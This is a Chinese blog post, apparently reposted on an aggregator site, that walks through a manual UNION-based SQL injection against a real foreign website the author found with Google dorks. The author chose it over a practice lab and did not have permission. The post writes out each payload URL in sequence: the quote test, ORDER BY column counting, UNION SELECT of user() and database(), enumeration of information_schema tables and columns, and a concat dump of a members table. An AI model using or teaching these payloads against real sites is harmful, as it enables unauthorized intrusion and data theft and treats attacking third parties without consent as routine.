实操:SQL注入国外xx网站

Posted 黑客技术与网络安全

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实操:SQL注入国外xx网站相关的知识,希望对你有一定的参考价值。

来自公众号:孑蝉

前言:

学了SQL注入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?

何为sql注入?

SQL注入就是SQL+注入,不清楚可以百度。

寻找网站:

google黑语法:


谷歌搜索也蛮有意思的,打inurl自动推荐了很多关键词,比如:“inurl php id”。


为什么不用百度呢?


少,并且找的多数为国内。

①、试探

http://www.xxx.org/members.php?id=1



用单引号“'”的时候,是会报错的。


接着测试,order by 5 ,以第5列进行排列,报错。当 表<=实际列数,就不会报错。


http://www.xxx.org/members.php?id=1 order by 5

实操:SQL注入国外xx网站


http://www.xxx.org/members.php?id=1 order by 4

实操:SQL注入国外xx网站


由以上可知,当前表的列为4。


知道了几列,接下来就能知道回显的是哪几列。

②、联合注入

http://www.xxx.org/members.php?id=1 and false union select 1,2,3,4

实操:SQL注入国外xx网站


回显了2,4列。


http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,database()

实操:SQL注入国外xx网站


接下来查字典库,information_schema。


http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,(selecttable_name from information_schema.tables where table_schema=database() limit0,1)

实操:SQL注入国外xx网站

http://www.xxx.org/members.php?id=1 and false union select 1,(select id from db83231_asfaa.members limit 0,1),3,(select column_name frominformation_schema.columns where table_schema=database() andtable_name='members' limit 0,1)

实操:SQL注入国外xx网站

concat字段查一查,member表里面到底有点啥。


http://www.xxx.org/members.php?id=1 and false union select 1,(select concat(id,nome,imagem,texto) from db83231_asfaa.members limit 0,1),3,(selectcolumn_name from information_schema.columns where table_schema=database() andtable_name='members' limit 0,1)

实操:SQL注入国外xx网站


???


实操:SQL注入国外xx网站

...


这是个什么网站呢?


实操:SQL注入国外xx网站


有点意思。还好查的都是网站允许显示的数据,不涉及敏感数据。


sqlmap就不上了(只能查出三个数据库,没权限)。


嗯。到此为止。





●编号1026,输入编号直达本文

●输入m获取文章目录

推荐↓↓↓

Linux学习

更多推荐

涵盖:程序人生、算法与数据结构、黑客技术与网络安全、大数据技术、前端开发、Java、Python、Web开发、安卓开发、ios开发、C/C++、.NET、Linux、数据库、运维等。

以上是关于实操:SQL注入国外xx网站的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入—— sql手动注入实操

(2020上半年第15天(SQL注入-注入实战(SQL注入(完结)10/10)))小迪网络安全笔记

SQL注入分享

SQL注入原理 手工注入access数据库

SQL注入

python打造一个分析网站SQL注入的脚本